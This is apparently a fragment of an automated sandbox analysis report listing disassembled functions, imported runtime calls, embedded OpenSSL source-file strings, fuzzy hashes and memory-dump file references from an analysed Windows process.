..\s\crypto\bio\b_sock2.c, xrefs: 00007FFD3FCAAD91, 00007FFD3FCAADAD
2, xrefs: 00007FFD3FCAADA5

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastsocket
String ID: ..\s\crypto\bio\b_sock2.c$2
API String ID: 1120909799-2051290508
Opcode ID: 17752033e88e5c1d7473bfd2b0c1ce437b1a41220bbb8c8318b7495dee5cf609
Instruction ID: 247a706ca871fc7de0df18fed9adb5b460ea39bcb8e9e563e2e8f9ec33a0a8fa
Opcode Fuzzy Hash: 17752033e88e5c1d7473bfd2b0c1ce437b1a41220bbb8c8318b7495dee5cf609
Instruction Fuzzy Hash: 2901D272B0858A82E7289B21F4545AD6320FB54754F644235E7AC43AD5CF3DE905E741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FE097A0 Relevance: 6.5, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE09935
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE0994D
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE09965
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE099A1
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE09A86

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 94ffc6ad3f96d9a989905e03bb8ee3f7920107806a19a48c78a6de0320431506
Instruction ID: 7beba72b96a3e1a748a875bcbe250cb38602db85260cd8a4ccb91220c3548836
Opcode Fuzzy Hash: 94ffc6ad3f96d9a989905e03bb8ee3f7920107806a19a48c78a6de0320431506
Instruction Fuzzy Hash: DE918162B0865B85FB189F63D9606BE63A2FF947C8F445031CF0D6BB89EE39E4459300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE643D Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFD3FDC751D
memset.VCRUNTIME140 ref: 00007FFD3FDC7589

Strings

@, xrefs: 00007FFD3FDC78AA
..\s\crypto\sm2\sm2_crypt.c, xrefs: 00007FFD3FDC7556, 00007FFD3FDC7594, 00007FFD3FDC75A8, 00007FFD3FDC75C0, 00007FFD3FDC7623, 00007FFD3FDC766A, 00007FFD3FDC7692, 00007FFD3FDC76D7, 00007FFD3FDC76F3, 00007FFD3FDC7705, 00007FFD3FDC7725, 00007FFD3FDC7780, 00007FFD3FDC7A6B, 00007FFD3FDC7AB3, 00007FFD3FDC7ADD, 00007FFD3FDC7B0C

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memset
String ID: ..\s\crypto\sm2\sm2_crypt.c$@
API String ID: 2221118986-485510600
Opcode ID: df5915b58d5333dd15294c4078e2d8fb8e8825f93f25321dd65e0d8dbaf45395
Instruction ID: 41171e0a0d456af1bbdbd72ff12c91bdfc5b84e3b98e27caaa543e44059ee11f
Opcode Fuzzy Hash: df5915b58d5333dd15294c4078e2d8fb8e8825f93f25321dd65e0d8dbaf45395
Instruction Fuzzy Hash: C102D0B2B1CA8A81EB28DB16F4245AE6761FB85B84F144131EF8D03B95DF3DE505EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE382D Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

..\s\crypto\evp\p5_crpt.c, xrefs: 00007FFD3FD6A48C, 00007FFD3FD6A536, 00007FFD3FD6A725, 00007FFD3FD6A754, 00007FFD3FD6A783
), xrefs: 00007FFD3FD6A77B

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: )$..\s\crypto\evp\p5_crpt.c
API String ID: 0-3563398421
Opcode ID: ce3edf7c7b35293dd360c7993c4080cdeb2a861f5dd31e0d9f413b47be3adb3a
Instruction ID: 81c4a9f4f46208ad2c8b6aa7393dd5f3fbf2a889a59abb2d627480ebb8451732
Opcode Fuzzy Hash: ce3edf7c7b35293dd360c7993c4080cdeb2a861f5dd31e0d9f413b47be3adb3a
Instruction Fuzzy Hash: D891D672B0C28B85EA28DF21F4246BE6390FF95780F985031EB8D47A86DF3CE545A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE153C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FCEFBB5
memmove.VCRUNTIME140 ref: 00007FFD3FCEFC63
memmove.VCRUNTIME140 ref: 00007FFD3FCEFCED

Strings

..\s\crypto\ct\ct_oct.c, xrefs: 00007FFD3FCEFAE5, 00007FFD3FCEFBDD, 00007FFD3FCEFBFB, 00007FFD3FCEFC77, 00007FFD3FCEFC93, 00007FFD3FCEFCBD, 00007FFD3FCEFCD5

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\ct\ct_oct.c
API String ID: 2162964266-1972679481
Opcode ID: 22b047c53aca8a421b254fcb9af9d11caf9798dd64a81551925779ed2160299d
Instruction ID: b56fc8a46586b9e9e2740a72774f8f57af1ed63db8647dc06edc5a0f0f6ab1a5
Opcode Fuzzy Hash: 22b047c53aca8a421b254fcb9af9d11caf9798dd64a81551925779ed2160299d
Instruction Fuzzy Hash: E871F46274D6C589E729CF25A0601BC3B70EB69F88F184136DF9D43386DE2DE686E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FC93970 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 155stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A33
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A4B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A68

Strings

content-type, xrefs: 00007FFD3FC9397A

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: content-type
API String ID: 1114863663-3266185539
Opcode ID: c2c47e3e37463ee51977dc268d001932b6a05f2b2afee0c90820ae9ea428ef8f
Instruction ID: 4cc53cbb36fb5ee71a0d6c70947d27cec2d67ad5694123df8ed7342d9a293359
Opcode Fuzzy Hash: c2c47e3e37463ee51977dc268d001932b6a05f2b2afee0c90820ae9ea428ef8f
Instruction Fuzzy Hash: 4F510162B0C64B41FA689B66B4A077F6395AF95B94F081230DF9D876C9EF2CE501E301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1C76 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9642A

Strings

DH PARAMETERS, xrefs: 00007FFD3FD963DB
..\s\crypto\pem\pem_pkey.c, xrefs: 00007FFD3FD96454, 00007FFD3FD96479, 00007FFD3FD96490
X9.42 DH PARAMETERS, xrefs: 00007FFD3FD96419

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp
String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
API String ID: 1004003707-3633731555
Opcode ID: 8e56e7b132d477a13a81abc69f4249faf25093a61a30f83c83e36b65657bf0c5
Instruction ID: 3e880a9a64c5b5b085d9e6b387617324ebae6dc56f2323c54f7945e306c025fd
Opcode Fuzzy Hash: 8e56e7b132d477a13a81abc69f4249faf25093a61a30f83c83e36b65657bf0c5
Instruction Fuzzy Hash: 7121B361B0CA8B81EA18DB95F0202AEB3A0FF94794F444032EB8C47B55EF7DD158EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE6A23 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMON

Download Yara Rule

Strings

b, xrefs: 00007FFD3FD41A26
..\s\crypto\engine\eng_ctrl.c, xrefs: 00007FFD3FD41859, 00007FFD3FD4192C, 00007FFD3FD4199D, 00007FFD3FD41A2E, 00007FFD3FD41B13, 00007FFD3FD41B51, 00007FFD3FD41B72, 00007FFD3FD41B92, 00007FFD3FD41BB6, 00007FFD3FD41BD4, 00007FFD3FD41BFC, 00007FFD3FD41C2C, 00007FFD3FD41C4E

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\engine\eng_ctrl.c$b
API String ID: 0-1836817417
Opcode ID: 6aad731b2f39985e24de66c229674f425687c09bbfe1a1d9549668a2a22939ac
Instruction ID: 2628181bba9ad196e77ce7eb1e41214a24e95123d2874299e7a6118e48f5e50c
Opcode Fuzzy Hash: 6aad731b2f39985e24de66c229674f425687c09bbfe1a1d9549668a2a22939ac
Instruction Fuzzy Hash: 7CE1DF61B0C24A82F62E8B12F4287B937A1FF81744F584136DB9D43B81DF3DE946A781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2743 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFD3FC8A8A2

Strings

%02d%02d%02d%02d%02d%02dZ, xrefs: 00007FFD3FC8A9B5
%04d%02d%02d%02d%02d%02dZ, xrefs: 00007FFD3FC8A9A8

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: _time64
String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
API String ID: 1670930206-2648760357
Opcode ID: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
Instruction ID: 8454bb8e6d27f3f25f9ed6421ce4b818e1299f684123d86123185943a4912661
Opcode Fuzzy Hash: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
Instruction Fuzzy Hash: 08517D72B0C7858AE764CB19F49026EB7A0FB98780F584135EB8D87B59EF3CE4419B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs
